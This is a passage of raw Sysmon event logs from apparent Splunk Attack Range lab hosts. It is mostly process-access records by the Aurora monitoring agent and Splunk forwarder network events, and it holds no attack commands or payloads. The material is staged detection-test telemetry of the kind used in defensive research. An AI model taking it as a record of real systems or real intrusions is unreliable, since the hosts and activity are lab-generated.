Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019142Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.949{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E6A5-63C7-4902-00000000B002}3580C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019141Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.950{E5A8D418-E6A5-63C7-4902-00000000B002}3580C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000019140Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.088{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50208-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000019139Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.224{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=057E09626A08AACFF94A770BF6A08E39,SHA256=8A6E5799B21CF888B8A101F418F1D7F5C2DD4112FBF010A000B8F72B27114769,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019138Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.037{E5A8D418-E6A4-63C7-4802-00000000B002}34762824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000048877Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:29.664{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56526-false10.0.1.12-8000- 10341000x800000000000000048924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.792{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.786{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.773{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.772{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.772{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.771{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.764{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.751{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.723{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.713{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.708{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.707{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.704{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048907Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.699{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048906Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.698{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.695{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048904Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.694{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048903Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.693{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048902Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.692{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048901Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.690{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000048900Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.594{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0A00-00000000AF02}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048899Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:34.594{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program 